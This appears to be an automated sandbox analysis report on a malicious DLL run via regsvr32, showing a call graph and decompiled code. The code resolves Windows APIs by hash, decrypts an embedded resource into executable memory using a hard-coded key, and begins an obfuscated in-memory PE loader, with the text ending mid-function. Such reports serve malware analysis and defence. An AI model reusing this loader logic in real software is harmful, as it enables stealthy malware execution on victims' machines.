__lock 35 API calls 16044->16048 16045->16044 16046 10016c1b GetModuleFileNameA 16045->16046 16047 10016c35 __lock _strncpy _strlen 16046->16047 16050 10019d1d __lock 6 API calls 16047->16050 16049 10016cf1 16048->16049 16050->16044 16052 10013ef0 HeapReAlloc 16051->16052 16053 10013f24 HeapAlloc 16051->16053 16054 10013f13 16052->16054 16055 10013f0f 16052->16055 16056 10013f4b 16053->16056 16057 10013f4f VirtualAlloc 16053->16057 16054->16053 16055->15929 16056->15929 16057->16056 16058 10013f69 HeapFree 16057->16058 16058->16056 16060 10013faa VirtualAlloc 16059->16060 16062 10013ff1 16060->16062 16062->15933 16063->15936 16065 100375bc __EH_prolog 16064->16065 16066 100375ea 16065->16066 16070 10037a1b 16065->16070 16066->15885 16068 100375d3 16078 10037a7e LeaveCriticalSection 16068->16078 16071 10037a24 16070->16071 16072 10037a29 16070->16072 16079 100379f7 16071->16079 16074 10037a42 EnterCriticalSection 16072->16074 16075 10037a6b EnterCriticalSection 16072->16075 16076 10037a63 LeaveCriticalSection 16074->16076 16077 10037a50 InitializeCriticalSection 16074->16077 16075->16068 16076->16075 16077->16076 16078->16066 16080 10037a00 InitializeCriticalSection 16079->16080 16081 10037a15 16079->16081 16080->16081 16081->16072 16083 100376c1 InitializeCriticalSection 16082->16083 16084 100376bc 16082->16084 16083->15889 16084->16083 16086 10037467 16085->16086 16087 100374b0 GlobalHandle GlobalUnlock GlobalReAlloc 16086->16087 16088 100374a0 GlobalAlloc 16086->16088 16094 1003751c ___initmbctable 16086->16094 16090 100374d5 16087->16090 16088->16090 16089 10037533 LeaveCriticalSection 16089->15894 16091 100374fc GlobalLock 16090->16091 16092 100374e0 GlobalHandle GlobalLock 16090->16092 16093 100374ee LeaveCriticalSection 16090->16093 16091->16094 16092->16093 16093->16091 16094->16089 16096 1003757a LeaveCriticalSection 16095->16096 16097 10037569 16095->16097 16096->15893 16097->16096 16098 1003756e TlsGetValue 16097->16098 16098->16096 16101 10037755 16100->16101 16102 10037814 LeaveCriticalSection 16100->16102 16101->16102 16103 1003775e TlsGetValue 16101->16103 16102->15896 16105 10037783 16103->16105 16106 1003776c 16103->16106 16115 1003741e LocalAlloc 16105->16115 16106->16102 16108 100377c4 LocalReAlloc 16106->16108 16109 100377b4 LocalAlloc 16106->16109 16110 100377d4 16108->16110 16109->16110 16111 100377e6 ___initmbctable 16110->16111 16112 100377d8 LeaveCriticalSection 16110->16112 16114 100377ff TlsSetValue 16111->16114 16119 1001ce3b 16112->16119 16114->16102 16116 10037433 16115->16116 16117 1003742e 16115->16117 16116->16106 16118 1001ce3b RaiseException 16117->16118 16118->16116 16122 10011c0f RaiseException 16119->16122 16121 1001ce54 16122->16121 16125 100373a5 16126 10037855 24 API calls 16125->16126 16127 100373b4 16126->16127 16123 100045d0 VirtualAlloc 16124 100045f0 VirtualFree

                                                                        Executed Functions

                                                                        Function 10006120 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 301memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 41%
                                                                        			E10006120(void* __ebx, void* __edi, void* __esi, void* __ebp, struct HINSTANCE__* _a4, signed int _a8) {
				void* _v4;
				void* _t36;
				void* _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				struct HRSRC__* _t65;
				signed int _t68;
				signed int _t69;
				void* _t77;
				void* _t79;
				intOrPtr _t83;
				signed int _t85;
				signed int _t96;
				void* _t97;
				signed int _t99;
				signed int _t100;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				long _t117;
				signed int _t119;
				void* _t121;
				struct HRSRC__* _t123;
				int _t124;
				void* _t127;
				struct HINSTANCE__* _t128;
				signed int _t129;
				void* _t133;
				signed int _t138;
				signed int _t149;
				signed int _t152;
				signed int _t157;
				intOrPtr _t182;

				if(_a8 != 1) {
					L6:
					return 1;
				} else {
					_t36 = E10005040(__edi);
					_t181 = _t36;
					if(_t36 != 0) {
						_push(0x1003ce28);
						E10011135(__ebx, __edi, __esi, __eflags);
						__eflags = 0;
						return 0;
					} else {
						_push(__ebx);
						_push(__ebp);
						_push(__esi);
						_push(__edi);
						_push(L"kernel32.dll");
						_push(0x3801a8f2);
						_push(0x1a322e2e);
						_push(0x628ad09);
						_push(0x31c6c0a1);
						_push(0x28b4cee6);
						 *0x1004b0d8 = 0;
						 *0x1004b0dc = 0;
						 *0x1004b0e0 = 0;
						 *0x1004b0e8 = 0;
						 *0x1004b0e4 = 0;
						 *0x1004b0ec = 0;
						 *0x1004b0f0 = 0;
						_t39 = E10001E60(_t181);
						_push(L"ntdll.dll");
						_push(0x1c9cdc39);
						_push(0x2d34cc91);
						_push(0x118db97f);
						_push(0x348b2998);
						_push(0x3446e98c);
						_t127 = _t39;
						_t40 = E10001E60(_t181);
						_push(L"msvcrt.dll");
						_push(0xe094f82);
						_push(0x20e23fe3);
						_push(0x156af904);
						_push(0x108d4cdc);
						_push(0x106d66fc);
						_t121 = E10001E60(_t181);
						_push(0x3ee42795);
						_push(_t121);
						_t42 = E10001FF0();
						_push(0x402c2791);
						_push(_t121);
						 *0x1004d3f0 = _t42;
						_t43 = E10001FF0();
						_push(0xb29018f0);
						_push(_t121);
						 *0x1004d3ec = _t43;
						_t44 = E10001FF0();
						_push(0xccfd283f);
						_push(_t121);
						 *0x1004d3e0 = _t44;
						_t45 = E10001FF0();
						_push(0x298c691d);
						_push(_t121);
						 *0x1004d3d0 = _t45;
						_t46 = E10001FF0();
						_push(0x40ec656b);
						_push(_t121);
						 *0x1004d3e4 = _t46;
						_t47 = E10001FF0();
						_push(0x40946966);
						_push(_t121);
						 *0x1004d3fc = _t47;
						_t48 = E10001FF0();
						_push(0x5496c247);
						_push(_t127);
						 *0x1004d3a8 = _t48;
						_t49 = E10001FF0();
						_push(0x3b465a8a);
						_push(_t127);
						 *0x1004d3ac = _t49;
						_t50 = E10001FF0();
						_push(0x66afc09d);
						_push(_t127);
						 *0x1004d3b8 = _t50;
						_t51 = E10001FF0();
						_push(0x5eb2ba6);
						_push(_t127);
						 *0x1004d3d4 = _t51;
						_t52 = E10001FF0();
						_push(0x3c6bbc0e);
						_push(_t127);
						 *0x1004d3cc = _t52;
						_t53 = E10001FF0();
						_push(0x3f32f2a5);
						_push(_t127);
						 *0x1004d3c8 = _t53;
						_t54 = E10001FF0();
						_push(0x112ecd9a);
						_push(_t127);
						 *0x1004d3d8 = _t54;
						_t55 = E10001FF0();
						_push(0xcfb09550);
						_push(_t127);
						 *0x1004d400 = _t55;
						_t56 = E10001FF0();
						_push(0x30fe1b19);
						_push(_t40);
						 *0x1004d3bc = _t56;
						_t57 = E10001FF0();
						_push(0x33a92211);
						_push(_t127);
						 *0x1004d3b4 = _t57;
						_t58 = E10001FF0();
						_push(0xaab3e2a9);
						_push(_t127);
						 *0x1004d3f8 = _t58;
						_t59 = E10001FF0();
						_push(0x31e84135);
						_push(_t127);
						 *0x1004d3f4 = _t59;
						_t60 = E10001FF0();
						_push(0xaef34aa1);
						_push(_t127);
						 *0x1004d3dc = _t60;
						_t61 = E10001FF0();
						_push(0x1e75927d);
						_push(_t127);
						 *0x1004d3b0 = _t61;
						_t62 = E10001FF0();
						_push(0x56331b6e);
						_push(_t127);
						 *0x1004d3e8 = _t62;
						_t63 = E10001FF0();
						_push(0x1cf8ffb);
						_push(_t127);
						 *0x1004d3c4 = _t63;
						_t64 = E10001FF0();
						_t128 = _a4;
						 *0x1004d3c0 = _t64; // executed
						_t65 = FindResourceW(_t128, 0x5f4c, 0x1003ce4c); // executed
						_t123 = _t65;
						_v4 = LoadResource(_t128, _t123);
						_t124 = SizeofResource(_t128, _t123);
						_t182 =  *0x1004d3b8; // 0x76d866e0
						if(_t182 == 0) {
							_t96 =  *0x1004b0e8; // 0x0
							_t113 =  *0x1004b0e0; // 0x0
							_t68 =  *0x1004b0d8; // 0x0
							_t129 =  *0x1004b0dc; // 0x0
							_t149 =  *0x1004b0ec; // 0x0
							_t69 =  *0x1004b0e4; // 0x0
							_t15 = _t113 * 2; // 0x3
							_t152 = _t149 * _t68 + ((_t96 * _t113 + _t68) * 0x3fffffff + _t129) * _t96 + _t113 + _t129;
							_a8 = _t152;
							_t110 = (_t129 + _t15 + 3) * _t69 << 2;
							_t20 = _t96 + 2; // 0x2
							_t157 =  *0x1004b0d8; // 0x0
							_t117 = _t69 - _t20 * _t129 - _t113 * _t157 + (_t69 - _t20 * _t129 - _t113 * _t157) * 0x00000002 + (_t69 * _t96 * _t157 + _t69 * _t96 * _t157 * 0x00000002 - 0x00000003) *  *0x1004b0ec + 0x00002000 | 0x00001000 + _a8 * 0x00000004 - _t110;
							__eflags = _t117;
							_t77 = VirtualAlloc(0, _t124, _t117, 0x40 + _t152 * 4 - _t110);
						} else {
							_t112 =  *0x1004b0e8; // 0x0
							_t119 =  *0x1004b0dc; // 0x0
							_t85 =  *0x1004b0ec; // 0x0
							_t99 =  *0x1004b0d8; // 0x0
							_t4 = _t99 + 0x3fffffff; // 0x3fffffff
							_t138 =  *0x1004b0e0; // 0x0
							_t8 = _t138 * 2; // 0x3
							_t100 =  *0x1004b0e0; // 0x0
							_t77 =  *0x1004d3b8(0xffffffff, 0, _t124, 0x00001000 + (_t85 * _t99 + ((_t112 * _t138 + _t99) * 0x3fffffff + _t119) * _t112 - (_t119 + _t8 + 0x00000003) *  *0x1004b0e4 + _t100 + _t119) * 0x00000004 | _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + _t85 *  *0x1004b0e4 * _t112 * _t112 * _t112 * _t112 * _t112 + _t119 + 0x00002000, 0x40 + (_t112 * 0x3fffffff + _t4 * _t119 + _t85 + _t138) * 4, 0); // executed
						}
						_t133 = _t77;
						memcpy(_t133, _v4, _t124);
						_t79 = malloc(0x9d1);
						_t97 = _t79;
						E10002340();
						E100027D0();
						 *0x1004d3e0(_t97, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t97, _t133, _t124, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t97, "8nGA7ohfFpugG(l$!#2u__*t5EaFD77", 0x20);
						_t83 = E10005260();
						 *0x1004d408 = _t83;
						 *0x1004d404(_a4, 1, 0, _t133, _t124, E100045D0, E100045F0, E10004610, E10004650, E10004670, 0);
						goto L6;
					}
				}
			}


























































                                                                        0x10006126
                                                                        0x10006566
                                                                        0x1000656c
                                                                        0x1000612c
                                                                        0x1000612c
                                                                        0x10006131
                                                                        0x10006133
                                                                        0x1000656f
                                                                        0x10006574
                                                                        0x1000657c
                                                                        0x1000657f
                                                                        0x10006139
                                                                        0x10006139
                                                                        0x1000613a
                                                                        0x1000613b
                                                                        0x1000613c
                                                                        0x1000613d
                                                                        0x10006142
                                                                        0x10006147
                                                                        0x1000614e
                                                                        0x10006153
                                                                        0x10006158
                                                                        0x1000615d
                                                                        0x10006163
                                                                        0x10006169
                                                                        0x1000616f
                                                                        0x10006175
                                                                        0x1000617b
                                                                        0x10006181
                                                                        0x10006187
                                                                        0x1000618c
                                                                        0x10006191
                                                                        0x10006196
                                                                        0x1000619b
                                                                        0x100061a0
                                                                        0x100061a5
                                                                        0x100061aa
                                                                        0x100061ac
                                                                        0x100061b1
                                                                        0x100061b6
                                                                        0x100061bb
                                                                        0x100061c0
                                                                        0x100061c5
                                                                        0x100061ca
                                                                        0x100061d9
                                                                        0x100061db
                                                                        0x100061e0
                                                                        0x100061e1
                                                                        0x100061e6
                                                                        0x100061eb
                                                                        0x100061ec
                                                                        0x100061f1
                                                                        0x100061f6
                                                                        0x100061fb
                                                                        0x100061fc
                                                                        0x10006201
                                                                        0x10006206
                                                                        0x1000620b
                                                                        0x1000620c
                                                                        0x10006211
                                                                        0x10006216
                                                                        0x1000621b
                                                                        0x1000621c
                                                                        0x10006221
                                                                        0x10006226
                                                                        0x1000622b
                                                                        0x1000622c
                                                                        0x10006231
                                                                        0x10006236
                                                                        0x1000623b
                                                                        0x1000623c
                                                                        0x10006241
                                                                        0x10006246
                                                                        0x1000624b
                                                                        0x1000624c
                                                                        0x10006251
                                                                        0x10006259
                                                                        0x1000625e
                                                                        0x1000625f
                                                                        0x10006264
                                                                        0x10006269
                                                                        0x1000626e
                                                                        0x1000626f
                                                                        0x10006274
                                                                        0x10006279
                                                                        0x1000627e
                                                                        0x1000627f
                                                                        0x10006284
                                                                        0x10006289
                                                                        0x1000628e
                                                                        0x1000628f
                                                                        0x10006294
                                                                        0x10006299
                                                                        0x1000629e
                                                                        0x1000629f
                                                                        0x100062a4
                                                                        0x100062a9
                                                                        0x100062ae
                                                                        0x100062af
                                                                        0x100062b4
                                                                        0x100062b9
                                                                        0x100062be
                                                                        0x100062bf
                                                                        0x100062c4
                                                                        0x100062c9
                                                                        0x100062ce
                                                                        0x100062cf
                                                                        0x100062d4
                                                                        0x100062dc
                                                                        0x100062e1
                                                                        0x100062e2
                                                                        0x100062e7
                                                                        0x100062ec
                                                                        0x100062f1
                                                                        0x100062f2
                                                                        0x100062f7
                                                                        0x100062fc
                                                                        0x10006301
                                                                        0x10006302
                                                                        0x10006307
                                                                        0x1000630c
                                                                        0x10006311
                                                                        0x10006312
                                                                        0x10006317
                                                                        0x1000631c
                                                                        0x10006321
                                                                        0x10006322
                                                                        0x10006327
                                                                        0x1000632e
                                                                        0x10006333
                                                                        0x10006334
                                                                        0x1000633a
                                                                        0x1000633f
                                                                        0x10006344
                                                                        0x10006345
                                                                        0x1000634a
                                                                        0x1000634f
                                                                        0x10006361
                                                                        0x10006366
                                                                        0x10006368
                                                                        0x10006374
                                                                        0x1000637e
                                                                        0x10006380
                                                                        0x10006386
                                                                        0x10006432
                                                                        0x10006438
                                                                        0x1000643e
                                                                        0x10006443
                                                                        0x10006449
                                                                        0x10006459
                                                                        0x1000646d
                                                                        0x10006474
                                                                        0x10006476
                                                                        0x10006481
                                                                        0x10006487
                                                                        0x10006494
                                                                        0x100064c4
                                                                        0x100064c4
                                                                        0x100064ca
                                                                        0x1000638c
                                                                        0x1000638c
                                                                        0x10006392
                                                                        0x10006398
                                                                        0x1000639e
                                                                        0x100063a4
                                                                        0x100063b9
                                                                        0x100063d6
                                                                        0x100063fa
                                                                        0x10006427
                                                                        0x10006427
                                                                        0x100064d5
                                                                        0x100064d9
                                                                        0x100064e4
                                                                        0x100064f1
                                                                        0x10006503
                                                                        0x1000651a
                                                                        0x10006523
                                                                        0x10006546
                                                                        0x10006557
                                                                        0x1000655c
                                                                        0x00000000
                                                                        0x10006565
                                                                        0x10006133

                                                                        APIs
                                                                        • FindResourceW.KERNELBASE(?,00005F4C,1003CE4C), ref: 10006366
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 1000636C
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 10006378
                                                                        • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,00000000), ref: 10006427
                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,?,00000000), ref: 100064CA
                                                                        • memcpy.MSVCRT ref: 100064D9
                                                                        • malloc.MSVCRT ref: 100064E4
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10006523
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$AllocVirtual$??3@FindLoadNumaSizeofmallocmemcpy
                                                                        • String ID: 8nGA7ohfFpugG(l$!#2u__*t5EaFD77$kernel32.dll$msvcrt.dll$ntdll.dll
                                                                        • API String ID: 3024364686-882265788
                                                                        • Opcode ID: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                        • Instruction ID: 1699d20feb2015e992388abaa39e01a506b89f8495deb80be789641e5ebed42c
                                                                        • Opcode Fuzzy Hash: 73f28b8c6d58252cdff927fcb48cb9a981f06cd2f682e57dd75e91a0e94e53b4
                                                                        • Instruction Fuzzy Hash: ACA159719403256FF704EF748EC6E96769CEB46681B00453FF511E726AEBB0B5008B9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10005260 Relevance: 7.1, APIs: 4, Instructions: 1092memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 98 10005260-1000530c 99 10006011-1000601a 98->99 100 10005312-10005361 98->100 100->99 101 10005367-10005409 100->101 101->99 102 1000540f-10005488 101->102 102->99 103 1000548e-100054cb 102->103 103->99 104 100054d1-10005505 103->104 104->99 105 1000550b-10005594 104->105 106 1000559a-100055be 105->106 107 100056bc-100056c2 105->107 109 100055c4-100055d1 106->109 108 100056c8-10005803 GetNativeSystemInfo call 10002bf0 * 2 107->108 108->99 121 10005809-10005914 108->121 111 100055d3-10005602 109->111 112 10005604-10005642 109->112 113 10005644-10005654 111->113 112->113 115 10005656-10005697 113->115 116 10005699 113->116 118 1000569f-100056b4 115->118 116->118 118->109 120 100056ba 118->120 120->108 123 10005a04-10005a9b GetProcessHeap HeapAlloc 121->123 124 1000591a-100059fc 121->124 125 10005ae8-10005bdd call 10002c60 123->125 126 10005a9d-10005ae7 123->126 124->99 129 10005a02 124->129 132 10005be3-10005e5a memcpy call 10002ca0 125->132 133 10006008-1000600e call 10004dd0 125->133 129->123 132->133 139 10005e60-10005ec1 132->139 133->99 140 10005ec7-10005f56 call 10003b80 139->140 141 10005f58 139->141 143 10005f5f-10005f91 call 10003f40 140->143 141->143 143->133 147 10005f93-10005fd6 call 10003570 143->147 149 10005fdb-10005fe0 147->149 149->133 150 10005fe2-10006006 call 10003ad0 149->150 150->133 153 1000601b-10006026 150->153 154 1000602c-10006031 153->154 155 1000610d-1000611d 153->155 156 10006033-100060a4 154->156 157 100060a5-1000610c 154->157
                                                                        C-Code - Quality: 73%
                                                                        			E10005260() {
				signed int _t340;
				signed int _t351;
				signed int _t354;
				signed int _t356;
				signed int _t360;
				void* _t373;
				signed int _t385;
				signed int _t388;
				signed int _t398;
				signed int _t403;
				intOrPtr _t405;
				void* _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t423;
				signed int _t425;
				void* _t433;
				signed int _t436;
				signed int _t437;
				signed int _t438;
				void* _t441;
				signed int _t442;
				signed int _t444;
				signed int _t448;
				intOrPtr _t453;
				signed int _t454;
				signed int _t463;
				void* _t467;
				signed int _t468;
				signed int _t469;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t476;
				intOrPtr _t478;
				signed int _t481;
				void* _t492;
				signed int _t498;
				signed int _t520;
				intOrPtr _t523;
				signed int _t532;
				signed int _t533;
				signed short* _t542;
				signed int _t545;
				signed int _t563;
				signed int _t571;
				signed int _t579;
				signed int _t580;
				signed int _t583;
				intOrPtr _t585;
				signed int _t587;
				signed int _t590;
				signed int _t604;
				signed int _t624;
				intOrPtr _t636;
				signed int _t637;
				signed int _t642;
				signed int _t665;
				signed int _t668;
				signed int _t673;
				signed int _t691;
				signed int _t692;
				signed int _t706;
				signed int _t707;
				signed int _t716;
				signed int _t717;
				signed int _t722;
				signed int _t726;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t736;
				signed int _t738;
				signed int _t739;
				signed int _t743;
				signed int _t752;
				signed int _t754;
				signed int _t756;
				signed int _t759;
				signed int _t761;
				signed int _t765;
				signed int _t766;
				signed int _t770;
				signed int _t778;
				signed int _t780;
				signed int _t789;
				signed int _t795;
				signed int _t836;
				signed int _t840;
				signed int _t841;
				signed int _t853;
				signed int _t867;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t895;
				signed int _t900;
				signed int _t903;
				signed int _t905;
				signed int _t907;
				signed int _t913;
				signed int _t918;
				signed int _t921;
				signed int _t924;
				signed int _t928;
				signed int _t930;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t941;
				intOrPtr* _t951;
				signed int _t954;
				signed int _t955;
				signed int _t956;
				signed int _t962;
				signed int _t963;
				signed int _t970;
				signed int _t971;
				signed int _t981;
				signed int _t988;
				signed int _t989;
				signed int _t995;
				signed int _t1035;
				signed int _t1041;
				signed int _t1042;
				signed int _t1043;
				signed short _t1049;
				signed int _t1050;
				signed int _t1051;
				signed int _t1064;
				intOrPtr* _t1066;
				signed int _t1067;
				signed int _t1075;
				signed int _t1076;
				signed int _t1084;
				signed int _t1085;
				signed int _t1086;
				signed int _t1091;
				signed int _t1094;
				signed int _t1097;
				signed int _t1126;
				signed int _t1128;
				signed int _t1132;
				signed int _t1135;
				signed int _t1138;
				signed int _t1153;
				signed int _t1165;
				signed int _t1166;
				signed int _t1167;
				intOrPtr* _t1168;
				signed int _t1169;
				signed int _t1170;
				signed int _t1174;
				signed int _t1184;
				signed int _t1187;
				signed int _t1200;
				void* _t1202;
				signed int _t1227;
				signed int _t1237;
				void* _t1248;
				void* _t1249;
				void* _t1250;
				void* _t1251;

				_t691 =  *0x1004b0ec; // 0x0
				_t340 =  *0x1004b0e4; // 0x0
				_t981 =  *0x1004b0e0; // 0x0
				_t932 =  *0x1004b0d8; // 0x0
				_t795 =  *0x1004b0dc; // 0x0
				_t933 =  *0x1004b0e8; // 0x0
				_t4 = _t981 * _t933 + 2; // 0x2
				_t5 = _t795 + 0x3fffffff; // 0x3fffffff
				_t6 = _t691 + 0x3fffffff; // 0x3fffffff
				_t934 =  *0x1004b0e0; // 0x0
				_t532 =  *0x1004b0d8; // 0x0
				 *(_t1248 + 0x14) = 0;
				if( *((intOrPtr*)(_t1248 + 0x60)) + ((_t691 * 0x3fffffff + _t6 * _t340 + _t933 << 1) - (_t934 * _t532 * _t795 + 1) * _t795 + _t532) * 2 < 0x40 + (_t5 * _t340 + (_t340 + _t4) * _t981 + _t933 + (_t981 * 0x3fffffff - (_t691 * _t932 + 1) * _t340 + _t795 + 2) * _t932 + _t691 + _t795) * 4) {
					L32:
					return 0;
				} else {
					_t988 =  *0x1004b0e0; // 0x0
					_t533 = _t532 * _t795;
					_t941 =  *0x1004b0e8; // 0x0
					_t989 = _t988 * _t691;
					 *(_t1248 + 0x10) = _t533;
					 *(_t1248 + 0x30) = _t989;
					_t542 =  *(_t1248 + 0x5c);
					if(( *_t542 & 0x0000ffff) != (_t533 - _t941 + _t941 * 2 - _t340 - _t691 << 1) - (_t691 + _t691 + (_t989 * _t691 + _t795) * _t795 * 2) *  *0x1004b0e0 + 0x5a4d) {
						goto L32;
					} else {
						_t995 = _t941 * _t691;
						 *(_t1248 + 0x20) = _t542[0x1e];
						 *(_t1248 + 0x2c) = _t995;
						_t545 =  *0x1004b0d8; // 0x0
						_t26 = (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545) * 2; // 0x7
						_t1126 =  *0x1004b0e0; // 0x0
						_t36 = _t691 + 1; // 0x1
						if( *((intOrPtr*)(_t1248 + 0x60)) + (_t36 * _t340 + (((_t941 * _t941 * _t941 + _t795 * _t795) * 0x3fffffff + _t1126) * _t795 + 1) * _t941 +  *(_t1248 + 0x10) + _t691) * 4 <  *(_t1248 + 0x20) + (((_t995 +  *(_t1248 + 0x10)) * _t795 + _t941) * _t340 + _t941 * _t545 + _t26 + 7) *  *0x1004b0e0 + _t691 * 0x55555551 + _t545 + (_t691 * 0x55555551 + _t545) * 2 + (_t340 * 4 - 5) * _t795 + _t941 * 7 - _t340 + 0xf8) {
							goto L32;
						} else {
							_t1128 =  *0x1004b0e8; // 0x0
							_t951 = (_t795 - _t691 + 1) * _t795 + (_t795 - _t691 + 1) * _t795 * 4 - (_t691 + _t691 * 4 + 5) * _t1128 - _t691 + _t691 * 4 + ( *(_t1248 + 0x5c))[0x1e] +  *(_t1248 + 0x5c);
							_t47 = _t340 + 0x7fffffff; // 0x7fffffff
							 *(_t1248 + 0x18) = _t340 + _t340;
							_t52 = _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + 0x4550; // 0x4550
							_t1132 =  *0x1004b0e8; // 0x0
							_t563 =  *0x1004b0d8; // 0x0
							 *((intOrPtr*)(_t1248 + 0x24)) = _t951;
							if( *_t951 != _t691 * 0x7ffffffb + _t47 * _t795 + _t1128 + (3 - _t795) *  *0x1004b0e0 + _t52 - ( *(_t1248 + 0x18) + 2 + _t1132 * 2) * _t563) {
								goto L32;
							} else {
								_t1135 =  *0x1004b0e0; // 0x0
								_t1138 =  *0x1004b0e0; // 0x0
								if(( *(_t951 + 4) & 0x0000ffff) != ((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138 + 0x14c + (((_t691 + _t563) *  *0x1004b0e8 - _t795 + 2) * _t795 - (_t1135 + 2) * _t340 -  *0x1004b0e8 - _t691 + _t1138) * 2) {
									goto L32;
								} else {
									 *(_t1248 + 0x1c) =  *(_t951 + 0x38);
									_t1035 =  *0x1004b0e0; // 0x0
									 *(_t1248 + 0x20) = _t563 + _t563 * 2;
									if(( *(_t1248 + 0x1c) &  *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691 + 0x00000001 + ( *(_t1248 + 0x20) + _t1035 * _t1035 * _t1035 * _t795 + _t691 + _t691) * 0x00000002) != 0) {
										goto L32;
									} else {
										_t1041 =  *0x1004b0e0; // 0x0
										_t1042 =  *0x1004b0e8; // 0x0
										_t1043 =  *0x1004b0e8; // 0x0
										_t571 =  *0x1004b0d8; // 0x0
										_t1153 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x20) = ((_t563 * _t563 + _t1041) * _t563 + (_t563 - _t340 - _t691) * _t795 + (2 - _t1042 -  *0x1004b0d8) * _t1043 + (_t571 + _t795) * 2 - _t340 + _t691) * 0x78 + _t951 + ( *(_t951 + 0x14) & 0x0000ffff) + 0x18;
										_t579 =  *(_t1248 + 0x18);
										_t83 = _t795 - 2; // -2
										_t1049 = (_t795 + _t83 - _t579) * _t340 + ((_t1153 * _t795 + 1) * _t691 + 0x7fffffff) * _t1043 * 2 + ( *(_t951 + 6) & 0x0000ffff) - _t691 + _t691;
										if(_t1049 == 0) {
											_t580 =  *0x1004b0d8; // 0x0
											_t1050 =  *0x1004b0e8; // 0x0
										} else {
											 *((intOrPtr*)(_t1248 + 0x28)) =  ~_t579 - _t691 * 4;
											 *(_t1248 + 0x10) =  *(_t1248 + 0x20) + 0xc;
											_t673 =  *0x1004b0d8; // 0x0
											 *(_t1248 + 0x20) = _t1049;
											_t1086 =  *0x1004b0e8; // 0x0
											do {
												_t1237 =  *( *(_t1248 + 0x10) + 4);
												 *(_t1248 + 0x18) = _t1237;
												if(_t1237 != 0) {
													_t951 =  *((intOrPtr*)(_t1248 + 0x24));
													_t1091 = (4 + _t340 * 4) * _t673 + (_t1086 * 8 - 0xc) * _t795 +  *(_t1248 + 0x18) + (_t691 + _t691 * 2 + (_t691 + _t1086 * 2 + _t673 + 1) *  *0x1004b0e0 + _t1086) * 4 +  *( *(_t1248 + 0x10));
												} else {
													_t97 = _t795 + 0x7ffffffe; // 0x7ffffffe
													_t1094 =  *0x1004b0e0; // 0x0
													_t1091 =  *(_t1248 + 0x1c) + (((_t340 + _t691) * _t1086 + _t691) * 0x7fffffff + _t97 * _t795 + _t1094 * 2) * 2 +  *( *(_t1248 + 0x10));
												}
												 *(_t1248 + 0x18) = _t1091;
												if(_t1091 <=  *((intOrPtr*)(_t1248 + 0x28)) +  *(_t1248 + 0x14)) {
													_t673 =  *0x1004b0d8; // 0x0
												} else {
													_t1097 =  *0x1004b0e0; // 0x0
													_t673 =  *0x1004b0d8; // 0x0
													 *(_t1248 + 0x14) =  *(_t1248 + 0x18) + ((_t340 + _t795) * 0x3fffffff + ((_t340 *  *0x1004b0d8 + 1) * 0x3fffffff + _t1097) *  *0x1004b0e8 + _t1097 + _t691 + _t673) * 4;
												}
												_t1086 =  *0x1004b0e8; // 0x0
												 *(_t1248 + 0x10) =  *(_t1248 + 0x10) + 0x28;
												_t129 = _t1248 + 0x20;
												 *_t129 =  *(_t1248 + 0x20) - 1;
											} while ( *_t129 != 0);
										}
										_t133 =  *(_t1248 + 0x2c) * _t580 + 2; // 0x2
										 *0x1004d3bc(_t1248 + 0x34 + ((_t340 - _t691 - 4) * _t795 - (_t340 + _t133) * _t1050 + ( *(_t1248 + 0x30) + _t580 + 2) *  *0x1004b0e0 - _t691) * 0x6c);
										_t351 =  *0x1004b0e4; // 0x0
										_t692 =  *0x1004b0ec; // 0x0
